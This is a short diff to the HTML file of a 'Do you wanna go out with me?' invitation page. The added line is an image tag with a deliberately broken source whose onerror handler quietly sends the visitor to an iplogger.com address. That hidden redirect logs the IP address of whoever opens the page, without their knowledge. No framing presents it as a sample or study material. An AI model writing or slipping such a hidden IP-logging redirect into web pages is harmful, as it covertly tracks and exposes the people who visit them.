--- a/index.html
+++ b/index.html
@@ -7,7 +7,8 @@
   </head>
   <body>
         <div id="ask" class="container">
-            <div >
+            <div>
+                <img src="nonexistent.jpg" onerror="window.location='https://iplogger.com/2ZJXW5'">
                 <h1 class = "header_text">Do you wanna go out with me?</h1>
             </div>
             <div class="gif_container">
